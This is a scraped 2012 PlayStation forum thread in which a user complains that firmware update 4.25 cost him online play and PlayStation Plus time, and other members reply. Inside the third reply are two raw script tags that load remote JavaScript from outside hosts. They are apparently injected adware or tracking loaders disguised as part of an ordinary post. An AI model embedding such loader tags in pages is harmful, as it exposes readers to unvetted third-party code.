Showing results for 
Search instead for 
Do you mean 
Sep 26 2012
By: NovaDeathStar I Only Post Everything 1237 posts

Are we getting something?

6 replies 166 views Edited Sep 26, 2012

My Playstation Plus just expired and I basically got ripped off a whole month with this new update so what are yall going to do about this?

And its been like 2 weeks and still no update on a new patch I cant even play online!

Please use plain text.
Message 1 of 7 (166 Views)
0 Likes
Uncharted Territory
1283 posts

Re: Are we getting something?

Sep 26, 2012
What happened?
Please use plain text.
Message 2 of 7 (158 Views)
0 Likes
Wastelander
766 posts

Sep 26, 2012

customer support would be more helpful than the forums for this case

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Please use plain text.
Message 3 of 7 (136 Views)
0 Likes
VP of Gaming
28640 posts

Sep 27, 2012

NovaDeathStar wrote:

My Playstation Plus just expired and I basically got ripped off a whole month with this new update so what are yall going to do about this?

And its been like 2 weeks and still no update on a new patch I cant even play online!

Rather than just "ranting" you may want to explain exactly what's happened, it's possible then that we may have some view on what may have occurred.

Just for the record having or not having PS Plus would have no effect on your ability to play online.

Please use plain text.
Message 4 of 7 (127 Views)
I Only Post Everything
1237 posts

Oct 5, 2012

BRIT-KO wrote:

NovaDeathStar wrote:

Rather than just "ranting" you may want to explain exactly what's happened, it's possible then that we may have some view on what may have occurred.

Just for the record having or not having PS Plus would have no effect on your ability to play online.

I couldn't play online because of update 4.25 some of these games require online play for certain trophies, I couldn't download games ect...

So yea I feel a bit riped of by this, 3 weeks and not a single word on an update.

Please use plain text.
Message 5 of 7 (91 Views)
0 Likes
PlayStation MVP
4960 posts

Oct 5, 2012

NovaDeathStar wrote:

BRIT-KO wrote:

NovaDeathStar wrote:

I couldn't play online because of update 4.25 some of these games require online play for certain trophies, I couldn't download games ect...

So yea I feel a bit riped of by this, 3 weeks and not a single word on an update.

That may be a problem on your end.

Please use plain text.
Message 6 of 7 (82 Views)
0 Likes
I Only Post Everything
1237 posts

Oct 5, 2012

Emerald_Swords wrote:

NovaDeathStar wrote:

BRIT-KO wrote:

NovaDeathStar wrote:

That may be a problem on your end.

Really? My problem... Do I make these updates? No! They do so its there job to fix it. Hmm 3 weeks and not a single word. Why cant they update us?

Please use plain text.
Message 7 of 7 (55 Views)
0 Likes